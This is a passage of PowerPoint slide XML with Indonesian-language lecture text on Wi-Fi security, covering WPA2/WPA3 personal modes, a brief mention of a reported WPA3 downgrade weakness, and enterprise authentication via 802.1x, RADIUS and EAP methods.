              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WPA2-Personal dan WPA3-SAE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WPA2-PSK dan WPA3- Personal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WPA3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WPA2 lama (mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Transisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WPA3-Pribadi). Para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada WPA3-Personal, salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>satunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> downgrade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WPA2 (wi-fi.org/security-update-april-2019).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lanjut</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA2/WPA3-Enterprise, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 802.1x, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, 802.1x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS (Remote Authentication Dial-In User Service), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA2/WPA3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewajibkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Extensible Authentication Protocol (EAP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP-TLS, EAP-TTLS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PEAP, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. EAP-TLS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> timbal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balik</a:t>
